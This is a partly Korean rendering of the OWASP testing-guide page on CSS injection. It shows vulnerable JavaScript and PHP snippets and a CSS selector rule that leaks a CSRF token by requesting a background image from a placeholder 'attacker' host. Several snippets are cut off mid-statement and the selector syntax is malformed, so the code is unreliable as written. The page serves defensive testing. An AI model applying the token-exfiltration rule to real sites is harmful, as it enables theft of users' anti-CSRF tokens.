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OTG-CLIENT-005 (CSS 인젝션 침투 테스트)


CSS 인젝션 취약점은 신뢰할 수 있는 웹 사이트의 내용에 임의의 CSS 코드를 삽입할 수 있는 기능을 포함하고 있고, 이는 피해자 브라우저에 렌더링될 수 있습니다.

The impact of such a vulnerability may vary on the basis of the supplied CSS payload: it could lead to Cross-Site Scripting in particular circumstances, to data exfiltration in the sense of extracting sensitive data or to UI modifications.

테스트 방법

어플리케이션이 사용자가 생성한 CSS를 입력할 수 있거나 합법적인 스타일시트로 방해하는 것이 가능하다면 취약점이 발생할 수 있습니다. Injecting code in the CSS context gives the attacker the possibility to execute JavaScript in certain conditions as well as extracting sensitive values through CSS selectors and functions able to generate HTTP requests. Actually, giving the users the possibility to customize their own personal pages by using custom CSS files results in a considerable risk, and should be definitely avoided. The following JavaScript code shows a possible vulnerable script in which the attacker is able to control the "location.hash" (source) which reaches the "cssText" function (sink). This particular case may lead to DOMXSS in older browser versions, such as

DOM XSS Wiki 의 "Style Sinks" 참고

<a id="a1">Click me</a>
if (location.hash.slice(1)) {
document.getElementById("a1").style.cssText = "color: " +

Specifically the attacker could target the victim by asking her to visit the following URLs:

The same vulnerability may appear in the case of classical reflected XSS in which for instance the PHP code looks like the following:

p {
color: <?php echo $_GET['color']; ?>;
text-align: center;

Much more interesting attack scenarios involve the possibility to extract data through the adoption of pure CSS rules. Such attacks can be conducted through CSS selectors and leading for instance to grab anti-CSRF tokens, as follows. In particular, input[ name=csrf_token][value=^a] represents an element with the attribute "name" set "csrf_token" and whose attribute "value" starts with "a". By detecting the length of the attribute "value", it is possible to carry out a brute force attack against it and send its value to the attacker`s domain.

input[name=csrf_token][value=^a] {
background-image: url(http://attacker/log?a);

Much more modern attacks involving a combination of SVG, CSS and HTML5 have been proven feasible, therefore we recommend to see the References section for details.

Black Box testing

We are referring to client-side testing, therefore black box testing is not usually performed since access to the source code is always available as it needs to be sent to the client to be executed. However, it may happen that the user is given a certain degree of freedom in terms of possibilities to supply HTML code; in that case it is required to test whether no CSS injections are possible: tags like "link" and "style" should be disallowed, as well

as attributes "style".

Gray Box testing

Testing for CSS Injection vulnerabilities: Manual testing needs to be conducted and the JavaScript code analyzed in order to understand whether the attackers can inject its own content in CSS context. In particular we should be interested in how the website returns CSS rules on the basis of the inputs. The following is a basic example:

<a id="a1">Click me</a>
$("b").attr("style","color: " + location.hash.slice(1));

The above code contains a source "location.hash" that is controlled by the attacker that can inject directly in the attribute "style" of an HTML element. As mentioned above, this may lead to different results on the basis of the adopted browser and the supplied payload. It is recommended that testers use the jQuery function css(property, value) in such circumstances as follows, since this would disallow any damaging injections. In general, we recommend to use always a whitelist of allowed characters any time the input is reflected in the CSS context.


OWASP Resources


  • DOM Xss Identification and Exploitation, Stefano Di Paola - Got Your Nose! How To Steal Your Precious Data Without Using Scripts, Mario Heiderich - watch?v=FIQvAaZj_HA - Bypassing Content-Security-Policy, Alex Kouzemtchenko

Proof of Concepts